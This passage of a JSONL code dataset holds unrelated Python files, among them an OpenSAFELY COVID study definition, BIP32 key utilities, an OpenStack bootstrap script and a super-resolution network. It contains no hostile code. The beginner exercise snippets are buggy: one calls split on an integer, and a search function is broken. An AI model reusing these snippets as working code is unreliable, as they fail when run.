ctx.reply(text)\n","sub_path":"tasks/story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"14354501","text":"import re\n\nfile = open(\"training_set_tweets.txt\", \"r\")\nlines = file.read().split('\\n')\nreg = re.compile(r'^\\d+\\t+\\d+\\t+[^\\\\\\t\\x00]*\\t' \n + r'\\d{4}-\\d{2}-\\d{2}\\s\\d{2}:\\d{2}:\\d{2}$')\n\nfor line in lines:\n if re.match(reg, line):\n print(line)\n","sub_path":"submission/files/get_valid.py","file_name":"get_valid.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389379524","text":"from reportlab.pdfgen import canvas\n\n\nfile_name = 'C:/PP/DCProject/DCP/TestPart/MyPDF.pdf'\ndocumentTitle = 'Order_Title + Order_pk'\nimg = 'C:/PP/DCProject/DCP/TestPart/jf669qNTpM2H5G92EllzGrpy6xptDnfM.png'\n\n\npdf = canvas.Canvas(file_name)\ncanvas.Canvas.setFont(pdf, \"Times-Roman\", 10)\npdf.setTitle(documentTitle)\nmasshtab = 2.834\npdf.rect(0, 0, 210*masshtab, 297*masshtab, stroke=1, fill=0)\n\n'''\nФункция Добавления одного кода\ndef funk():\n detail_title, position_code, position_quantity, order\n1. Добавить рамку\n2. Дабавить текст\n3. 
Добавить код \n'''\n\n\ndef crete_one_pos(x, y, detail_title, position_code, position_quantity, order, img):\n pdf.rect(x, y, 63.33 * masshtab, 31.5 * masshtab, stroke=1, fill=0)\n canvas.Canvas.drawImage(pdf, img, x+34.83*masshtab, y+3*masshtab, width=25.5 * masshtab, height=25.5 * masshtab)\n pdf.drawString(x+3*masshtab, y+3*masshtab, detail_title)\n pdf.drawString(x+3*masshtab, y+9.375*masshtab, position_code)\n pdf.drawString(x+3*masshtab, y+15.75*masshtab, position_quantity)\n pdf.drawString(x+3*masshtab, y+22.125*masshtab, order)\n\n\ndef create_pdf():\n detail_title = 'detail_title' # получаем из цикла по заказу\n position_code = 'position_code' # получаем из цикла по заказу\n position_quantity = 'position_quantity' # получаем из цикла по заказу\n order = 'order' # получаем из цикла по заказу\n img = 'C:/PP/DCProject/DCP/TestPart/jf669qNTpM2H5G92EllzGrpy6xptDnfM.png' # получаем из цикла по заказу\n x = 5 * masshtab\n y = 5 * masshtab\n crete_one_pos(x, y, detail_title, position_code, position_quantity, order, img)\n\ncreate_pdf()\npdf.save()\n\n\n","sub_path":"TestPart/test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522566978","text":"import os\nimport sqlite3\nimport subprocess\n\nconn = sqlite3.connect('skyhook.sqlite3')\nc = conn.cursor()\n\nfor dirname in os.listdir('/mnt/bdd/bdd-selected-videos/frames-half/'):\n\tnframes = len([fname for fname in os.listdir('/mnt/bdd/bdd-selected-videos/frames-half/' + dirname) if fname.endswith('.jpg')])\n\tc.execute('INSERT INTO clips (video_id, nframes, width, height) VALUES (4, ?, 640, 360)', (nframes,))\n\tsubprocess.call(['ln', '-s', '/mnt/bdd/bdd-selected-videos/frames-half/' + dirname, 'clips/4/{}'.format(c.lastrowid)])\n\nconn.commit()\nconn.close()\n","sub_path":"scripts/import_bdd.py","file_name":"import_bdd.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"481280480","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 18 21:12:08 2016\r\n\r\n@author: Ariadni\r\n\"\"\"\r\n\r\ndef bookPages(pagesContent):\r\n\r\n#Input\r\n#pagesContent Number of pages of content (whole number).\r\n#Output\r\n#pagesBooklet Number of pages in booklet (whole number).\r\n pagesBooklet=pagesContent\r\n while pagesBooklet%4!=0:\r\n pagesBooklet+=1\r\n return pagesBooklet\r\n#print(bookPages(19))","sub_path":"ExamSolutions/bookPages.py","file_name":"bookPages.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329664431","text":"##############################################################################\n#\n# This script provides the formal specification of the study data\n# that will be extracted from\n# the OpenSAFELY database.\n#\n# STUDY PURPOSE: to perform regression discontinuity of 2022/23 \n# autumn booster COVID-19 vaccine, before and after 50+ became eligible\n# on October 15, 2022\n#\n# This study definition extracts counts of outcomes by week during the study period\n#\n##############################################################################\n\n\n# IMPORT STATEMENTS ----\n\n# Import code building blocks from cohort extractor package\nfrom cohortextractor import (\n StudyDefinition,\n patients,\n Measure,\n codelist,\n)\n\n# Import codelists from codelist.py (which pulls them from the codelist 
folder)\nfrom codelists import *\n\nCOHORT = \"output/cohort/cohort_final_sep_measures.csv\"\n\n# Specify study definition\nstudy = StudyDefinition(\n\n # Configure the expectations framework\n default_expectations = {\n \"date\": {\"earliest\": \"2020-12-08\", \"latest\": \"2023-02-01\"},\n \"rate\": \"uniform\",\n \"incidence\": 0.5,\n },\n \n # Set index date\n index_date = \"2022-09-03\",\n\n population=patients.which_exist_in_file(COHORT),\n\n ## Extract DOB, DOB and flu vax date from previously generated cohort\n # Date of birth month/year\n dob=patients.with_value_from_file(\n COHORT,\n returning=\"dob\",\n returning_type=\"date\",\n ),\n \n # Date of death\n dod=patients.with_value_from_file(\n COHORT,\n returning=\"dod\",\n returning_type=\"date\",\n ),\n\n # Flu vax\n flu_vax_date=patients.with_value_from_file(\n COHORT,\n returning=\"flu_vax_date\",\n returning_type=\"date\",\n ),\n \n boost_date=patients.with_value_from_file(\n COHORT,\n returning=\"boost_date\",\n returning_type=\"date\",\n ),\n\n ############################################################\n ## OUTCOMES\n ############################################################\n \n # All-cause death\n anydeath=patients.died_from_any_cause(\n returning=\"binary_flag\",\n between=[\"index_date\",\"index_date + 6 days\"], \n return_expectations = {\"incidence\": 0.4},\n ),\n \n # COVID death\n coviddeath=patients.with_these_codes_on_death_certificate(\n covid_codes,\n returning=\"binary_flag\",\n between=[\"index_date\",\"index_date + 6 days\"], \n return_expectations = {\"incidence\": 0.4},\n ),\n \n # COVID unplanned admission\n covidadmitted=patients.admitted_to_hospital(\n with_admission_method=[\"21\", \"22\", \"23\", \"24\", \"25\", \"2A\", \"2B\", \"2C\", \"2D\", \"28\"],\n with_these_diagnoses=covid_codes,\n between=[\"index_date\",\"index_date + 6 days\"], \n returning=\"binary_flag\",\n return_expectations = {\"incidence\": 0.4},\n ), \n \n # COVID emergency attendance \n covidemergency=patients.attended_emergency_care(\n between=[\"index_date\",\"index_date + 6 days\"], \n with_these_diagnoses = covid_emergency,\n returning=\"binary_flag\",\n return_expectations = {\"incidence\": 0.4},\n ),\n\n # COVID composite\n covidcomposite=patients.categorised_as(\n {\n 0: \"DEFAULT\",\n 1: \"\"\"\n coviddeath = 1 OR\n covidadmitted = 1 OR\n covidemergency = 1\n \"\"\",\n },\n return_expectations = {\"incidence\": 0.4},\n ),\n\n # Respiratory death (underlying cause only)\n respdeath=patients.with_these_codes_on_death_certificate(\n resp_codes,\n match_only_underlying_cause=True,\n returning=\"binary_flag\",\n between=[\"index_date\",\"index_date + 6 days\"], \n return_expectations = {\"incidence\": 0.4},\n ),\n \n # Respiratory unplanned admission (primary diagnosis only)\n respadmitted=patients.admitted_to_hospital(\n with_admission_method=[\"21\", \"22\", \"23\", \"24\", \"25\", \"2A\", \"2B\", \"2C\", \"2D\", \"28\"],\n with_these_primary_diagnoses=resp_codes,\n between=[\"index_date\",\"index_date + 6 days\"], \n returning=\"binary_flag\",\n return_expectations = {\"incidence\": 0.4},\n ),\n\n # Respiratory composite\n respcomposite=patients.categorised_as(\n {\n 0: \"DEFAULT\",\n 1: \"\"\"\n respdeath = 1 OR\n respadmitted = 1\n \"\"\"\n },\n return_expectations = {\"incidence\": 0.4},\n ),\n \n # Unplanned hospital admission (all cause)\n anyadmitted=patients.admitted_to_hospital(\n with_admission_method=[\"21\", \"22\", \"23\", \"24\", \"25\", \"2A\", \"2B\", \"2C\", \"2D\", \"28\"],\n with_patient_classification = 
[\"1\"], # ordinary admissions only\n between=[\"index_date\",\"index_date + 6 days\"], \n returning=\"binary_flag\",\n return_expectations = {\"incidence\": 0.4},\n ),\n)\n\n\n\n# --- DEFINE MEASURES ---\nmeasures = [\n Measure(\n id = \"anydeath\",\n numerator = \"anydeath\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"anyadmitted\",\n numerator = \"anyadmitted\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"covidadmitted\",\n numerator = \"covidadmitted\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"covidemergency\",\n numerator = \"covidemergency\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"covidcomposite\",\n numerator = \"covidcomposite\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n Measure(\n id = \"respcomposite\",\n numerator = \"respcomposite\",\n denominator = \"population\",\n group_by = \"population\",\n ),\n\n]","sub_path":"analysis/study_definition_measures.py","file_name":"study_definition_measures.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"163350722","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n\nblock_freq = {}\n\ndef read_blktrace(file):\n f = open(file)\n for line in f:\n # print(line)\n line_element = line.split()\n if len(line_element) > 0 and line_element[0] == \"259,0\":\n # print(line_element)\n block_num= int(line_element[7])\n if block_num not in block_freq:\n block_freq[block_num] = 0\n block_freq[block_num] += 1\n f.close()\n block_lst = [[item[0], item[1]] for item in block_freq.items()]\n block_lst = sorted(block_lst, key=lambda kv: kv[1])\n block_lst.reverse()\n num = np.array(block_lst)\n return num\n\nif __name__ == \"__main__\":\n fs = \"ext4\"\n filename = \"{}_{}_sx-stackoverflow_3600\"\n block_freq = {}\n num1 = read_blktrace(filename.format(fs, \"memoryAndDisk\"))\n block_freq = {}\n num2 = read_blktrace(filename.format(fs, \"diskOnly\"))\n\n # max_access = max(num1[..., 1][0], num2[..., 1][0])\n max_block = max(num1.shape[0], num2.shape[0])\n\n if num1.shape[0] == max_block:\n _num1 = num1[..., 1]\n _num2 = np.concatenate((num2[..., 1], np.zeros(max_block - num2.shape[0])))\n else:\n _num1 = np.concatenate((num1[..., 1], np.zeros(max_block - num1.shape[0])))\n _num2 = num2[..., 1]\n\n # x = np.linspace(0, max_block, num=max_block)\n x = np.linspace(0, max_block, num=max_block)[:250]\n\n # plt.plot(x, _num1, label=\"memoryAndDisk\")\n # plt.plot(x, _num2, label=\"diskOnly\")\n plt.plot(x, _num1[:250], label=\"memoryAndDisk\")\n plt.plot(x, _num2[:250], label=\"diskOnly\")\n\n plt.xlabel(\"block\")\n plt.ylabel(\"access times\")\n\n plt.title(\"{} Frequency distribution\".format(fs))\n plt.legend()\n # plt.savefig('png/{}.png'.format(\"{} Frequency distribution\".format(fs)), dpi=1200)\n plt.savefig('png/{}_focus.png'.format(\"{} Frequency distribution\".format(fs)), dpi=1200)\n\n print(\"finished\")","sub_path":"hw3/python/block_each_fs.py","file_name":"block_each_fs.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19692474","text":"import codecs\nfrom hashlib import sha256\nfrom ecdsa import SigningKey, VerifyingKey, ellipticcurve\nfrom ecdsa.ellipticcurve import Point, CurveFp\nimport 
ecdsa\n\nfrom bip32utils import BIP32Key\n\nimport logging\n\ndecode_hex = codecs.getdecoder(\"hex_codec\")\nencode_hex = codecs.getencoder(\"hex_codec\")\n\n\nclass Bip32Keys:\n\n def __init__(self, init_params):\n if isinstance(init_params, str):\n self.init_from_entropy(init_params)\n elif isinstance(init_params, dict):\n if 'entropy' in init_params:\n self.init_from_entropy(init_params['entropy'])\n elif 'private_key' in init_params:\n self.init_from_private_key(init_params['private_key'])\n else:\n raise NotImplementedError()\n\n def init_from_entropy(self, entropy):\n entropy = entropy.encode()\n\n key = BIP32Key.fromEntropy(entropy, public=False)\n self.private_key = key.PrivateKey()\n self.public_key = key.PublicKey()\n\n self.uncompressed_public_key = decode_hex(Bip32Keys.to_uncompressed_public_key(\n self.get_public_key()\n ))[0]\n\n def init_from_private_key(self, private_key):\n sk = SigningKey.from_string(string=decode_hex(private_key)[0], curve=ecdsa.SECP256k1, hashfunc=sha256)\n vk = sk.get_verifying_key()\n\n self.private_key = sk.to_string()\n self.public_key = decode_hex(Bip32Keys.to_compressed_public_key(encode_hex(vk.to_string())[0].decode()))[0]\n self.uncompressed_public_key = b'\\x04' + vk.to_string()\n\n def get_public_key(self):\n return encode_hex(self.public_key)[0].decode()\n\n def get_private_key(self):\n return encode_hex(self.private_key)[0].decode()\n\n def get_uncompressed_public_key(self):\n return encode_hex(self.uncompressed_public_key)[0].decode()\n\n def sign_msg(self, message):\n return Bip32Keys.sign_message(message, self.get_private_key())\n\n def verify_msg(self, message, signature):\n return Bip32Keys.verify_message(message, signature, self.get_uncompressed_public_key())\n\n @staticmethod\n def to_uncompressed_public_key(public_key):\n if len(public_key) == 130:\n return public_key\n elif len(public_key) == 128:\n return '04' + public_key\n p_hex = 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F'\n p = int(p_hex, 16)\n\n x_hex = public_key[2:66]\n x = int(x_hex, 16)\n prefix = public_key[0:2]\n\n y_square = (pow(x, 3, p) + 7) % p\n y_square_square_root = pow(y_square, (p + 1) // 4, p)\n if (prefix == \"02\" and y_square_square_root & 1) or (prefix == \"03\" and not y_square_square_root & 1):\n y = (-y_square_square_root) % p\n else:\n y = y_square_square_root\n\n computed_y_hex = format(y, '064x')\n computed_uncompressed_key = \"04\" + x_hex + computed_y_hex\n\n return computed_uncompressed_key\n\n @staticmethod\n def to_compressed_public_key(public_key):\n if len(public_key) == 66:\n return public_key\n\n y_hex = public_key[64:]\n if int(y_hex, 16) & 1:\n prefix = '03'\n else:\n prefix = '02'\n\n if len(public_key) == 130:\n return prefix + public_key[2:66]\n elif len(public_key) == 128:\n return prefix + public_key[:64]\n\n @staticmethod\n def sign_message(message, private_key):\n priv_key = Bip32Keys._validate_private_key_for_signature(private_key)\n message = message.encode()\n sk = SigningKey.from_string(curve=ecdsa.SECP256k1, string=decode_hex(priv_key)[0], hashfunc=sha256)\n sig = sk.sign(message, sigencode=ecdsa.util.sigencode_der)\n return encode_hex(sig)[0].decode()\n\n @staticmethod\n def verify_message(message, signature, public_key):\n pub_key = Bip32Keys._validate_public_key_for_signature(public_key)\n sig = signature\n msg = message.encode()\n vk = VerifyingKey.from_string(string=decode_hex(pub_key)[0], curve=ecdsa.SECP256k1, hashfunc=sha256)\n\n if len(sig) == 128:\n vk.verify(decode_hex(sig)[0], msg, 
sigdecode=ecdsa.util.sigdecode_string)\n else:\n vk.verify(decode_hex(sig)[0], msg, sigdecode=ecdsa.util.sigdecode_der)\n\n return True\n\n @staticmethod\n def _validate_private_key_for_signature(private_key):\n if len(private_key) == 64:\n return private_key\n elif len(private_key) == 66:\n if private_key[0:2] == '80':\n return private_key[2:]\n elif private_key[-2:] == '01':\n return private_key[:-2]\n elif len(private_key) == 68:\n return private_key[2:-2]\n else:\n raise Exception('Bad private key length')\n\n @staticmethod\n def _validate_public_key_for_signature(public_key):\n if len(public_key) == 128:\n return public_key\n elif len(public_key) == 130:\n return public_key[2:]\n elif len(public_key) == 66:\n return Bip32Keys.to_uncompressed_public_key(public_key)[2:]\n else:\n raise Exception('Unsupported public key format')\n\n\n \"\"\"\n for asymetric encryption\n \"\"\"\n # Certicom secp256-k1\n _a = 0x0000000000000000000000000000000000000000000000000000000000000000\n _b = 0x0000000000000000000000000000000000000000000000000000000000000007\n _p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f\n _Gx = 0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798\n _Gy = 0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8\n _r = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141\n\n curve_secp256k1 = ecdsa.ellipticcurve.CurveFp(_p, _a, _b)\n generator_secp256k1 = ecdsa.ellipticcurve.Point(curve_secp256k1, _Gx, _Gy, _r)\n\n def get_shared_key(self, another_public_key):\n return Bip32Keys.generate_shared_key(self.get_private_key(), another_public_key)\n\n @staticmethod\n def generate_shared_key(private_key, public_key):\n public_key = Bip32Keys.to_uncompressed_public_key(public_key)\n private_key = int(private_key, 16)\n x = int(public_key[2:66], 16) # drop prefix\n y = int(public_key[-64:], 16)\n another_point = Point(Bip32Keys.curve_secp256k1, x, y)\n shared_point = another_point * private_key\n return str(hex(shared_point.x()))[2:] + str(hex(shared_point.y()))[2:]\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n keys = Bip32Keys({'entropy': '3123213213213123312c3kjifj3'})\n print('public key: ', keys.get_public_key())\n print('private key: ', keys.get_private_key())\n print('uncompressed public key: ', keys.get_uncompressed_public_key())\n sig = keys.sign_msg('hello world')\n print('signature: ', sig)\n print('verify signature: ', keys.verify_msg('hello world', sig))\n\n print('compressed: ', Bip32Keys.to_compressed_public_key('041ad7138370ef5e93fb243aff3373e2b92383818dfc20022841b655e0cd6c618cd578261c78e1adfe205c3ade8b81e1722d6058be9155eee55468fbb04b62040e'))\n\n keys2 = Bip32Keys({'entropy': 'fdjsofjioej9fsdfjdskfdsjkhfdsj'})\n print('shared key', keys2.get_shared_key(keys.get_public_key()))\n print('shared key', keys.get_shared_key(keys2.get_public_key()))\n print('shared key', Bip32Keys.generate_shared_key(keys.get_private_key(), keys2.get_public_key()))\n","sub_path":"parser/utils/bip32keys/bip32keys.py","file_name":"bip32keys.py","file_ext":"py","file_size_in_byte":7447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559881825","text":"\nimport os\nfrom keystoneauth1 import loading\nfrom keystoneauth1 import session\nfrom keystoneclient.v3 import client as keystone_v3\nfrom cinderclient import client as cinder\nfrom novaclient import client as nova\nfrom glanceclient import client as glance\nfrom neutronclient.v2_0 import client as 
neutron\n\n\ndef authentification():\n #get keystone auth\n openstack_credentials = {}\n openstack_credentials['username'] = os.environ['OS_USERNAME']\n openstack_credentials['password'] = os.environ['OS_PASSWORD']\n openstack_credentials['project_id'] = os.environ['OS_TENANT_ID']\n openstack_credentials['auth_url'] = os.environ['OS_AUTH_URL']\n loader = loading.get_plugin_loader('password')\n auth = loader.load_from_options(**openstack_credentials)\n sess = session.Session(auth=auth)\n return sess\n\ndef createInstance(keystonToken,instanceNAme,regionName,sshKeyName,flavorName,imageName,ip):\n VERSION = \"2\"\n sess = keystonToken\n instance = {}\n instance['name'] = instanceNAme\n instance['key_name'] = sshKeyName\n #Find Image ID in glance\n glanceConnect = glance.Client(VERSION, session=sess,region_name=regionName)\n allImages = glanceConnect.images.list()\n for t in allImages:\n if t['name'] == imageName:\n imageId = t['id']\n instance['image'] = imageId\n\n #Find flavor ID in Nova\n novaConnect = nova.Client(VERSION, session=sess,region_name=regionName)\n for t in novaConnect.flavors.list():\n if t.name == flavorName:\n flavorId = t.id\n instance['flavor'] = flavorId\n\n #addFileUserData\n fileUserData = os.path.join(os.getcwd(),'userdata',instance['name'])\n if os.path.isfile(fileUserData):\n file = open(fileUserData).read()\n instance[\"userdata\"] = file.replace(\"{IP}\", ip)\n\n neutronConnect = neutron.Client(session=sess,region_name=regionName)\n network = []\n #Ext-Net\n extNetwork = neutronConnect.list_networks(name='Ext-Net')['networks'][0]['id']\n network.append({\"net-id\": extNetwork, \"v4-fixed-ip\": ''})\n #Public\n publicNetwork = neutronConnect.list_networks(name='public')['networks'][0]['id']\n network.append({\"net-id\": publicNetwork, \"v4-fixed-ip\": ''})\n #Management\n managementNetwork = neutronConnect.list_networks(name='management')['networks'][0]['id']\n network.append({\"net-id\": managementNetwork, \"v4-fixed-ip\": ip})\n\n instance['nics'] = network\n novaConnect.servers.create(**instance)\n\nif __name__ == \"__main__\":\n regionName = os.environ['OS_REGION_NAME']\n flavorName = \"c2-7\"\n imageName = \"Ubuntu 16.04\"\n sshKeyName = \"deploy\"\n toCreateInstance = [('deployer','192.168.0.10'),\n ('rabbit','192.168.0.11'),\n ('mysql','192.168.0.12'),\n ('keystone','192.168.0.13'),\n ('nova','192.168.0.14'),\n ('glance','192.168.0.15'),\n ('neutron','192.168.0.16'),\n ('horizon','192.168.0.17'),\n ('compute-1','192.168.0.18')]\n\n sess = authentification()\n for instance,ip in toCreateInstance:\n createInstance(sess,instance,regionName,sshKeyName,flavorName,imageName,ip)\n\n","sub_path":"bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"166438556","text":"# 1\nimport math\npos = [0,0]\nwhile True:\n s = int(input(\"Enter Steps: \"))\n if not s:\n break\n movement = s.split(\" \")\n direction = movement[0]\n steps = int(movement[1])\n if direction==\"UP\":\n pos[0]+=steps\n elif direction==\"DOWN\":\n pos[0]-=steps\n elif direction==\"LEFT\":\n pos[1]-=steps\n elif direction==\"RIGHT\":\n pos[1]+=steps\n else:\n pass\nprint(round(math.sqrt(pos[1]**2+pos[0]**2)))\n\n# 2\ndef search(list, n):\n list = [1, 2, 3, 'jyo']\nn = input('enter input')\nif search(list, n):\n print(\"Found\")\nelse:\n print(\"Not Found\")\n\n# 3\nimport time\nt=time.localtime()\nh=t.tm_hour\nn = input('enter input')\nif h > 6 and h<18:\n print('It is 
day-time')\n\nelse:\n print('It is night-time')\n\n\n# 4\nfrom math import radians, sin, cos, acos\n\nprint(\"Input coordinates of two points:\")\nslat = radians(float(input(\"Starting latitude: \")))\nslon = radians(float(input(\"Ending longitude: \")))\nelat = radians(float(input(\"Starting latitude: \")))\nelon = radians(float(input(\"Ending longitude: \")))\n\ndist = 6371.01 * acos(sin(slat)*sin(elat) + cos(slat)*cos(elat)*cos(slon - elon))\nprint(\"The distance is %.2fkm.\" % dist)\n\n\n# 6\nlist = [x for x in range(2000,3200) if x%7==0 and x%5!=0]\nprint(list)\n\n# 7\ndef fact(n):\n if n==0:\n return 1\n return n*fact(n-1)\nresult = fact(8)\nprint(result)\n\n\n# 8\nimport math\nC= 50\nH = 30\nD = []\nresult =[]\nDv=input(\"enter the value of D\\n\")\nD=Dv.split(\",\")\nD = [int(i) for i in D]\ni=0\nl = len(D)\nwhile(i point\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n # feature channel downscale and upscale --> channel weight\n self.conv_du = nn.Sequential(\n nn.Conv2d(channel, channel // reduction, 1, padding=0, bias=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel // reduction, channel, 1, padding=0, bias=True),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n y = self.avg_pool(x)\n y = self.conv_du(y)\n return x * y\n\ndef fixed_padding(inputs, kernel_size, dilation):\n kernel_size_effective = kernel_size + (kernel_size - 1) * (dilation - 1)\n pad_total = kernel_size_effective - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n padded_inputs = F.pad(inputs, (pad_beg, pad_end, pad_beg, pad_end))\n return padded_inputs\n\nclass SeparableConv2d(nn.Module):\n def __init__(self, inplanes, planes, kernel_size=3, stride=1, dilation=1, bias=False, BatchNorm=None):\n super(SeparableConv2d, self).__init__()\n\n self.conv1 = nn.Conv2d(inplanes, inplanes, kernel_size, stride, 0, dilation,\n groups=inplanes, bias=bias)\n #self.bn = BatchNorm(inplanes)\n self.pointwise = nn.Conv2d(inplanes, planes, 1, 1, 0, 1, 1, bias=bias)\n\n def forward(self, x):\n x = fixed_padding(x, self.conv1.kernel_size[0], dilation=self.conv1.dilation[0])\n x = self.conv1(x)\n #x = self.bn(x)\n x = self.pointwise(x)\n return x\n \nclass MEuler(nn.Module):\n def __init__(\n self, n_feat, kernel_size, reduction,\n bias=True, bn=False, act=nn.ReLU(True)):\n \n super(MEuler,self).__init__()\n res1_body = []\n for i in range(2):\n res1_body.append(SeparableConv2d(n_feat, n_feat, kernel_size,1, 1, bias,None))\n if bn: res1_body.append(nn.BatchNorm2d(n_feat))\n if i == 0: res1_body.append(act)\n #res1_body.append(CALayer(n_feat, reduction))\n \n res2_body = []\n for i in range(2):\n res2_body.append(SeparableConv2d(n_feat, n_feat, kernel_size,1, 1, bias,None))\n if bn: res2_body.append(nn.BatchNorm2d(n_feat))\n if i == 0: res2_body.append(act)\n #res2_body.append(CALayer(n_feat, reduction))\n \n self.res1 = nn.Sequential(*res1_body)\n self.res2 = nn.Sequential(*res2_body)\n self.scale = 0.5\n \n def forward(self,x):\n res_1 = self.res1(x)\n out = x + res_1\n res_2 = self.res2(out)\n out = out + self.scale * (res_1+res_2)\n return out\n '''\n def forward(self,x):\n res_1 = self.res1(x)\n x = x + res_1\n res_2 = self.res2(x)\n x = x + self.scale * (res_1+res_2)\n return x\n ''' \n\n## Residual Group (RG)\nclass ResidualGroup(nn.Module):\n def __init__(self, conv, n_feat, kernel_size, reduction, act, res_scale, n_resblocks):\n super(ResidualGroup, self).__init__()\n modules_body = []\n modules_body = [\n MEuler(\n n_feat, kernel_size, reduction, True, False, act=nn.ReLU(True)) \\\n for _ in range(n_resblocks)]\n 
modules_body.append(conv(n_feat, n_feat, kernel_size))\n self.body = nn.Sequential(*modules_body)\n\n def forward(self, x):\n res = self.body(x)\n res += x\n return res\n\n## Residual Channel Attention Network (RCAN)\nclass XYJ(nn.Module):\n def __init__(self, args, conv=common.default_conv):\n super(XYJ, self).__init__()\n \n n_resgroups = args.n_resgroups\n n_resblocks = args.n_resblocks\n n_feats = args.n_feats\n kernel_size = 3\n reduction = args.reduction \n scale = args.scale[0]\n act = nn.ReLU(True)\n \n # RGB mean for DIV2K\n rgb_mean = (0.4488, 0.4371, 0.4040)\n rgb_std = (1.0, 1.0, 1.0)\n self.sub_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std)\n \n # define head module\n modules_head = [conv(args.n_colors, n_feats, kernel_size)]\n '''\n modules_head = [nn.Conv2d(3, 32, 3, padding=1, bias=False),nn.ReLU(True),\n nn.Conv2d(32, 64, 3, padding=1, bias=False),nn.ReLU(True),]\n '''\n # define body module\n modules_body = [\n ResidualGroup(\n conv, n_feats, kernel_size, reduction, act=act, res_scale=args.res_scale, n_resblocks=n_resblocks) \\\n for _ in range(n_resgroups)]\n\n modules_body.append(conv(n_feats, n_feats, kernel_size))\n\n # define tail module\n modules_tail = [\n common.Upsampler(conv, scale, n_feats, act=False),\n conv(n_feats, args.n_colors, kernel_size)]\n\n self.add_mean = common.MeanShift(args.rgb_range, rgb_mean, rgb_std, 1)\n\n self.head = nn.Sequential(*modules_head)\n self.body = nn.Sequential(*modules_body)\n self.tail = nn.Sequential(*modules_tail)\n\n def forward(self, x):\n x = self.sub_mean(x)\n x = self.head(x)\n\n res = self.body(x)\n res += x\n\n x = self.tail(res)\n x = self.add_mean(x)\n\n return x \n\n def load_state_dict(self, state_dict, strict=False):\n own_state = self.state_dict()\n for name, param in state_dict.items():\n if name in own_state:\n if isinstance(param, nn.Parameter):\n param = param.data\n try:\n own_state[name].copy_(param)\n except Exception:\n if name.find('tail') >= 0:\n print('Replace pre-trained upsampler to new one...')\n else:\n raise RuntimeError('While copying the parameter named {}, '\n 'whose dimensions in the model are {} and '\n 'whose dimensions in the checkpoint are {}.'\n .format(name, own_state[name].size(), param.size()))\n elif strict:\n if name.find('tail') == -1:\n raise KeyError('unexpected key \"{}\" in state_dict'\n .format(name))\n\n if strict:\n missing = set(own_state.keys()) - set(state_dict.keys())\n if len(missing) > 0:\n raise KeyError('missing keys in state_dict: \"{}\"'.format(missing))","sub_path":"train/code/model/XYJ/MEular/xyj_MEular2.py","file_name":"xyj_MEular2.py","file_ext":"py","file_size_in_byte":6792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197624298","text":"from datetime import datetime\nimport os.path as osp\nimport argparse\n# Create a file name that can be reused without having to make a new string for every file\n# and avoid it creating a new name and not being capable to read from the older file\n\n\ndef create_filename(id):\n if id == \"ig\":\n timestr = datetime.now().strftime(\"%Y-%m-%d\")\n return timestr\n else:\n # Create a filename based on the curren date and time in YYYY-MM-DD - HH\n timestr = datetime.now().strftime(\"%Y-%m-%d--%H\")\n\n return timestr\n\n\n# Check the given input file to see whether in exists\ndef get_searchterms(scraper_name):\n list_of_terms = []\n # Check whether the searchterms file exitst, else abort the scraper\n if not osp.exists(f'../search_terms_{scraper_name}.txt'):\n 
